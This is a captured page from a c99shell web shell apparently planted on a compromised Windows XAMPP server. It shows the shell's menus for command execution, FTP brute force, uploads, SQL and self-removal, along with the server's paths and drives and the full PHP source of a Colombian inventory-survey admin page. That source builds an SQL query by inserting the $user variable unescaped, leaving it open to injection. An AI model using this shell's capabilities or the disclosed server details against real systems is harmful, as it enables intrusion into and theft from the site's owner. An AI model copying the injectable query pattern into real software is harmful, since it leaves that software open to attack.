!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\xampp\xampp\htdocs\portel_dama\administracion\formas\   drwxrwxrwx
Free 8.79 GB of 239.26 GB (3.68%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     encuesta_sys_equipo.php (14.93 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
    $ib 
= isset($id);
    if (
$ib == false) {
        
$id 0;
    }
    
$ia = isset($accion);
    if (
$ia == false) {
        
$accion "x";
    }
    include(
'setup_administracion.php');
    include(
'../clases_herramientas/include_acciones.php');
    include(
'pass.php');
    
$id_app 73;
    
// 0. Extracción de la Entidad
    
$donde_entidad "administracion_contacto.contacto_nombre = '$user' and administracion_pertenencia_fuente_contacto.contacto_id = administracion_contacto.contacto_id and administracion_pertenencia_fuente_contacto.fuente_id = administracion_fuente.fuente_id";
    
$control = new select_v1(0"administracion_pertenencia_fuente_contacto.fuente_id, administracion_fuente.fuente_nombre""administracion_pertenencia_fuente_contacto, administracion_fuente, administracion_contacto"$donde_entidad20"(id)-(nombre)""""");
    
$entidad_id $control->RESULTADOS[0][0];
    
$entidad $control->RESULTADOS[0][1];
?> 
<link href="<?php echo $archivo_css?>" rel="stylesheet" type="text/css">
<title><?php echo $nombre_pagina?></title>
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_callJS(jsStr) { //v2.0
  return eval(jsStr)
}

function MM_openBrWindow(theURL,winName,features) { //v2.0
  window.open(theURL,winName,features);
}
//-->
</script>
<body bgcolor="<?php echo $color_fondo?>" leftmargin="0" topmargin="0">
<table width="100%" border="0" cellspacing="0" cellpadding="10">
  <tr>
    <td bgcolor="<?php echo $color_fondo_banner?>"> 
      <table width="100%" border="0" cellspacing="0" cellpadding="0">
        <tr>
          <td width="25%" valign="bottom"><img src="<?php echo $imagen_banner?>" width="<?php echo $ancho_banner?>" height="<?php echo $alto_banner?>"></td>
          <td width="50%" valign="bottom" class="texto"><table width="100%" border="0" cellspacing="0" cellpadding="0" class="texto">
              <tr> 
                <td width="25%"><img src="../imagenes/user.gif" width="22" height="28">UR: 
                  <?php echo $user?> / <?php echo $entidad?></td>
                <td width="25%" align="right"><a href="<?php echo $home_administrador?>"><img src="../imagenes/home.gif" alt="Ir al men&uacute; principal" width="32" height="29" border="0"></a><a href="#" onClick="MM_callJS('history.go(-1);')"><img src="../imagenes/back.gif" alt="Regresar" width="32" height="29" border="0"></a><a href="#"><img src="../imagenes/help_big.gif" alt="Ayuda General" width="34" height="29" border="0" onClick="MM_openBrWindow('aviso.php?tipo=2&idapp=<?php echo $id_app?>','','scrollbars=yes,width=400,height=300')"></a></td>
              </tr>
            </table></td>
          <td width="25%" align="right" valign="bottom" class="texto">&nbsp;</td>
        </tr>
      </table></td>
  </tr>
  
  <tr> 
    <td bgcolor="<?php echo $color_fondo_cuerpo?>"><table width="100%" border="0" cellspacing="0" cellpadding="6" class="texto">
        <?php if ($accion == "lock") { ?>
        <tr>
          <td><form name="form2" method="post" action="">
              <table width="100%" border="0" cellspacing="0" cellpadding="6" class="texto">
                <tr>
                  <td>&nbsp;</td>
                  <td align="left">Seleccionar Registros de Equipos</td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td width="25%">&nbsp;</td>
                  <td width="50%" align="center"><input name="id_app" type="hidden" id="id_app2" value="<?php echo $id_app?>"> 
                    <select name="id_equipo">
                      <?php $control = new select_v1(0"id_equipo""encuesta_sys_equipo""id_equipo != 0"10"(id)""<option value=\"(id)\">(id)</option>"""); ?>
                    </select> <select name="accion">
                      <option value="-1">Editar</option>
                      <option value="del_">Borrar</option>
                    </select> <input type="submit" name="Submit2" value="Ir..."> 
                    <input name="x_y" type="hidden" id="accion" value="<?php echo $uid->UID?>"> 
                    <input name="user" type="hidden" id="accion" value="<?php echo $user?>"> 
                  </td>
                  <td width="25%">&nbsp;</td>
                </tr>
              </table>
            </form></td>
        </tr>
        <?php ?>
        <?php if ($accion == "x") { ?>
        <tr>
          <td><form action="" method="post" enctype="multipart/form-data" name="form1">
              <table width="100%" border="0" cellspacing="0" cellpadding="6" class="texto">
                <tr> 
                  <td>&nbsp;</td>
                  <td colspan="2" align="left" bgcolor="#FF66CC"><font color="#FFFFFF"><strong>Agregar 
                    Equipo</strong></font></td>
                  <td>&nbsp;</td>
                </tr>
                <tr>
                  <td>&nbsp;</td>
                  <td align="right" bgcolor="#FFFFFF">Nombre:<br>
                    <font size="1">Nombre descriptivo del lote de equipos, usado 
                    solo con el fin de recordar este registro.</font></td>
                  <td bgcolor="#FFFFFF"><input name="nombre_equipo" type="text" id="cantidad_equipo2"></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td align="right" bgcolor="#FFFFFF">Tipo:</td>
                  <td bgcolor="#FFFFFF"> <select name="tipo_equipo" id="select4">
                      <?php $control = new select_v2(24); ?>
                    </select></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td width="25%">&nbsp;</td>
                  <td width="25%" align="right" bgcolor="#FFFFFF">Marca:<font color="#FF0000">&nbsp;</font></td>
                  <td width="25%" bgcolor="#FFFFFF"><select name="marca_equipo" id="select32">
                      <?php $control = new select_v2(25); ?>
                    </select> </td>
                  <td width="25%">&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td align="right" bgcolor="#FFFFFF">Procesador:</td>
                  <td bgcolor="#FFFFFF"><select name="procesador_equipo" id="select7">
                      <?php $control = new select_v2(26); ?>
                    </select></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td align="right" bgcolor="#FFFFFF">Velocidad de Procesamiento:</td>
                  <td bgcolor="#FFFFFF"><select name="velocidad_equipo" id="select8">
                      <?php $control = new select_v2(27); ?>
                    </select></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td align="right" bgcolor="#FFFFFF">Memoria RAM:</td>
                  <td bgcolor="#FFFFFF"><select name="memoria_ram_equipo" id="select33">
                      <?php $control = new select_v2(28); ?>
                    </select></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td align="right" bgcolor="#FFFFFF">Capacidad de Almacenamiento:</td>
                  <td bgcolor="#FFFFFF"><select name="capacidad_equipo" id="select9">
                      <?php $control = new select_v2(29); ?>
                    </select></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td align="right" bgcolor="#FFFFFF">Cantidad:</td>
                  <td bgcolor="#FFFFFF"><input name="cantidad_equipo" type="text" id="cantidad_equipo"></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td width="25%">&nbsp;</td>
                  <td colspan="2" align="center" bgcolor="#FFFFFF"> <input name="id_app" type="hidden" id="id_app3" value="<?php echo $id_app?>"> 
                    <input name="accion" type="hidden" id="accion" value="ins_"> 
                    <input type="submit" name="Submit" value="Agregar..."> <input name="x_y" type="hidden" id="accion" value="<?php echo $uid->UID?>"> 
                    <input name="user" type="hidden" id="accion" value="<?php echo $user?>"> 
                    <input name="id_inventario" type="hidden" id="id_app3" value="<?php echo $id_inventario?>"> 
                    <input name="id_entidad" type="hidden" id="id_app3" value="<?php echo $entidad_id?>"> 
                  </td>
                  <td width="25%">&nbsp;</td>
                </tr>
              </table>
            </form></td>
        </tr>
        <?php ?>
        <?php 
        
if ($accion == "-1") { ?>
        <tr>
          <td><form name="form3" method="post" action="" enctype="multipart/form-data">
              <table width="100%" border="0" cellspacing="0" cellpadding="6" class="texto">
                <tr> 
                  <td>&nbsp;</td>
                  <td colspan="2" align="left" bgcolor="#FF66CC"><font color="#FFFFFF"><strong>Editar 
                    Equipo</strong></font></td>
                  <td>&nbsp;</td>
                </tr>
                <tr>
                  <td>&nbsp;</td>
                  <td align="right" bgcolor="#FFFFFF">Nombre:</td>
                  <td bgcolor="#FFFFFF"><input name="nombre_equipo" type="text" id="cantidad_equipo3" value="<?php echo $arreglo->RESULTADOS[0][10]; ?>"></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td width="25%" align="right" bgcolor="#FFFFFF">Tipo:</td>
                  <td width="25%" bgcolor="#FFFFFF"> 
                    <?php $control = new arreglo_constante(24); ?>
                    <select name="tipo_equipo" id="select24">
                      <?php $control_f = new filtrar_select_edicion(""""""$control->ARREGLO_NOMBRES$control->ARREGLO_VALORES"id_equipo""tipo_equipo"$arreglo->RESULTADOS[0][0], "encuesta_sys_equipo""foto_tipo"); ?>
                    </select></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td align="right" bgcolor="#FFFFFF">Marca:</td>
                  <td bgcolor="#FFFFFF"> 
                    <?php $control = new arreglo_constante(25); ?>
                    <select name="marca_equipo" id="select25">
                      <?php $control_f = new filtrar_select_edicion(""""""$control->ARREGLO_NOMBRES$control->ARREGLO_VALORES"id_equipo""marca_equipo"$arreglo->RESULTADOS[0][0], "encuesta_sys_equipo""foto_tipo"); ?>
                    </select></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td align="right" bgcolor="#FFFFFF">Procesador:</td>
                  <td bgcolor="#FFFFFF"> 
                    <?php $control = new arreglo_constante(26); ?>
                    <select name="procesador_equipo" id="select26">
                      <?php $control_f = new filtrar_select_edicion(""""""$control->ARREGLO_NOMBRES$control->ARREGLO_VALORES"id_equipo""procesador_equipo"$arreglo->RESULTADOS[0][0], "encuesta_sys_equipo""foto_tipo"); ?>
                    </select></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td align="right" bgcolor="#FFFFFF">Velocidad de Procesamiento:</td>
                  <td bgcolor="#FFFFFF"> 
                    <?php $control = new arreglo_constante(27); ?>
                    <select name="velocidad_equipo" id="select27">
                      <?php $control_f = new filtrar_select_edicion(""""""$control->ARREGLO_NOMBRES$control->ARREGLO_VALORES"id_equipo""velocidad_equipo"$arreglo->RESULTADOS[0][0], "encuesta_sys_equipo""foto_tipo"); ?>
                    </select></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td align="right" bgcolor="#FFFFFF">Memoria RAM:</td>
                  <td bgcolor="#FFFFFF"> 
                    <?php $control = new arreglo_constante(28); ?>
                    <select name="memoria_ram_equipo" id="select28">
                      <?php $control_f = new filtrar_select_edicion(""""""$control->ARREGLO_NOMBRES$control->ARREGLO_VALORES"id_equipo""memoria_ram_equipo"$arreglo->RESULTADOS[0][0], "encuesta_sys_equipo""foto_tipo"); ?>
                    </select></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td align="right" bgcolor="#FFFFFF">Capacidad de Almacenamiento:</td>
                  <td bgcolor="#FFFFFF"> 
                    <?php $control = new arreglo_constante(29); ?>
                    <select name="capacidad_equipo" id="select29">
                      <?php $control_f = new filtrar_select_edicion(""""""$control->ARREGLO_NOMBRES$control->ARREGLO_VALORES"id_equipo""capacidad_equipo"$arreglo->RESULTADOS[0][0], "encuesta_sys_equipo""foto_tipo"); ?>
                    </select></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td align="right" bgcolor="#FFFFFF">Cantidad:</td>
                  <td bgcolor="#FFFFFF"><input name="cantidad_equipo" type="text" id="cantidad_equipo" value="<?php echo $arreglo->RESULTADOS[0][8?>"> 
                  </td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td width="25%">&nbsp;</td>
                  <td colspan="2" align="center" bgcolor="#FFFFFF"> <input name="id_app" type="hidden" id="id_app" value="<?php echo $id_app?>"> 
                    <input name="id_equipo" type="hidden" id="accion2" value="<?php echo $arreglo->RESULTADOS[0][0]; ?>"> 
                    <input name="accion" type="hidden" id="accion4" value="edi_"> 
                    <input type="submit" name="Submit3" value="Editar..."> <input name="x_y" type="hidden" id="accion" value="<?php echo $uid->UID?>"> 
                    <input name="user" type="hidden" id="accion" value="<?php echo $user?>"></td>
                  <td width="25%">&nbsp;</td>
                </tr>
              </table>
            </form></td>
        </tr><?php ?>
      </table></td>
  </tr>
  <tr> 
    <td align="center" bgcolor="<?php echo $color_fondo_pie?>" class="textopequeno"><?php echo $nombre_cliente?><br>
      Todos los Derechos Reservados para NRG<br>
      Bogot&aacute;, Colombia, S.A. <?php echo $ano_vig?><br>
      <a href="../../documentacion/terminos.htm">Terminos de Uso</a> <strong>I</strong> 
      <a href="../../documentacion/terms.htm">Terms of Use</a></td>
  </tr>
</table>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--